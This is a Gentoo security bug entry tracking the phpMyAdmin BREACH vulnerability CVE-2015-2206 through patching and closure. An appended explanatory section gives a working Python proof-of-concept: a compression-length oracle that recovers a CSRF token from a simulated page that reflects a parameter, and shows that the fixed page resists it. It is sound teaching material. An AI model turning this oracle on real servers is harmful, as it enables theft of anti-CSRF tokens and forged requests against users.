Summary: | <dev-db/phpmyadmin-{4.0.10.9,4.2.13.2,4.3.12}: Risk of BREACH attack due to reflected parameter (PMASA-2015-1) (CVE-2015-2206) | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Agostino Sarubbo <ago> |
Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | minor | CC: | jmbsvicetto, web-apps |
Priority: | Normal | ||
Version: | unspecified | ||
Hardware: | All | ||
OS: | Linux | ||
URL: | https://bugzilla.redhat.com/show_bug.cgi?id=1198794 | ||
Whiteboard: | B3 [noglsa] | ||
Package list: | Runtime testing required: | --- |
Description
Agostino Sarubbo
2015-03-05 07:53:21 UTC
15:33 < gentoovcs> jmbsvicetto → gentoo-x86 (dev-db/phpmyadmin/) Bump phpmyadmin to the latest releases and add 4.4.0_beta1. Address CVE-2014-{9218,9219} - fixes bug 531684. Address PMASA-2015-1 - fixes bug 542218. Drop old vulnerable versions.

Arch teams, please mark stable the following versions:
=dev-db/phpmyadmin-4.0.10.9
=dev-db/phpmyadmin-4.2.13.2
=dev-db/phpmyadmin-4.3.12
Target KEYWORDS="alpha amd64 hppa ppc ppc64 sparc x86".

Stable for HPPA.

x86 done.

amd64 stable

ppc stable

ppc64 stable

sparc stable

alpha stable

Maintainer(s), please cleanup. Security, please vote. Arches, thank you for your work.

GLSA Vote: No

Maintainer(s), please drop the vulnerable version(s).

CVE-2015-2206 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2206): libraries/select_lang.lib.php in phpMyAdmin 4.0.x before 4.0.10.9, 4.2.x before 4.2.13.2, and 4.3.x before 4.3.11.1 includes invalid language values in unknown-language error responses that contain a CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.

(In reply to Yury German from comment #9)
> Maintainer(s), please drop the vulnerable version(s).

02:17 < gentoovcs> jmbsvicetto → gentoo-x86 (dev-db/phpmyadmin/) Drop vulnerable version - bug 542218.
02:17 < willikins> gentoovcs: https://bugs.gentoo.org/542218 "<dev-db/phpmyadmin-{4.0.10.9,4.2.13.2,4.3.12}: Risk of BREACH attack due to reflected parameter (PMASA-2015-1) (CVE-2015-2206)"; Gentoo Security, Vulnerabilities; IN_P; ago:security

done

Maintainer(s), thank you for cleanup. GLSA vote: no. Closing as [noglsa]
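The CVE text in this bug names the ingredients of the attack but not how they combine: a response that echoes an attacker-chosen parameter, a secret (the CSRF token) in the same response, and HTTP compression. The script below is an added example, not code from this bug, from Gentoo or from phpMyAdmin. It models that combination on a constructed error page (the markup, the `lang` parameter, the 16-hex-digit token and the helper names are all assumptions made for the example) and recovers the token one hex digit at a time by watching only the DEFLATE output length, then shows that the same oracle learns nothing once the page stops echoing the rejected value.

```python
"""BREACH-style compression oracle against an error page that reflects a
request parameter next to a CSRF token, the pattern CVE-2015-2206 describes.
Added example, not phpMyAdmin code: the markup, the 'lang' parameter and
the token are constructed stand-ins."""
import zlib

ALPHABET = "0123456789abcdef"
# Constructed token. Every bigram in it is unique, so a wrong guess can never
# create a second LZ77 match; the only parse difference between a right and a
# wrong guess is the length of the copy taken from the reflected prefix.
TOKEN = "7f3a9c0e5b2d8614"
Z_FIXED = getattr(zlib, "Z_FIXED", 4)  # strategy constant, value 4 in zlib.h


def page_vulnerable(lang: bytes, token: str) -> bytes:
    """Error page that echoes the unknown 'lang' value next to the token."""
    return (b"<html><body><p>Unknown language: " + lang + b"</p>"
            + b'<input type="hidden" name="token" value="' + token.encode()
            + b'"></body></html>')


def page_fixed(lang: bytes, token: str) -> bytes:
    """Hardened variant: the rejected value is never echoed, so nothing the
    attacker controls shares the compression context with the token."""
    return (b"<html><body><p>Unknown language requested.</p>"
            + b'<input type="hidden" name="token" value="' + token.encode()
            + b'"></body></html>')


def deflate_len(body: bytes) -> int:
    """Length of the body as DEFLATE would put it on the wire. Fixed Huffman
    codes are forced so the only variable cost is the LZ77 parse; with
    dynamic codes the attack still works but needs repeated measurements."""
    c = zlib.compressobj(9, zlib.DEFLATED, 15, 9, Z_FIXED)
    return len(c.compress(body) + c.flush())


def make_oracle(page):
    """The attacker's measurement: request the page with a chosen 'lang' and
    observe the compressed length. Eight requests with 0..7 filler bytes
    (0x90-0x96: unique, and 9-bit literals under fixed Huffman) are summed so
    that byte rounding cannot hide a difference of a single literal."""
    def oracle(guess: bytes) -> int:
        return sum(deflate_len(page(guess + bytes(range(0x90, 0x90 + n)), TOKEN))
                   for n in range(8))
    return oracle


def recover_token(oracle, length=len(TOKEN), prefix=b'value="'):
    """Guess the token digit by digit. The reflected 'value="<known>c' is a
    copy source for the real 'value="<token>'; only the right c lets the
    copy run one byte longer, so that response is the shortest one."""
    known = b""
    for _ in range(length):
        best = min(ALPHABET, key=lambda ch: oracle(prefix + known + ch.encode()))
        known += best.encode()
    return known.decode()


if __name__ == "__main__":
    print("vulnerable page:", recover_token(make_oracle(page_vulnerable)))
    print("fixed page:     ", recover_token(make_oracle(page_fixed)))
```

Against `page_fixed` every guess produces the same length, so the search degenerates to the first candidate at each step and learns nothing; that is the property the advisory's fix (not reflecting the invalid language value) restores. Real deployments add noise the example removes on purpose: dynamic Huffman tables, TLS record framing and other request-dependent content all mean more samples per digit, which is why the other standard mitigation, masking the CSRF token with a fresh random value on every response, is worth having even where nothing is intentionally reflected.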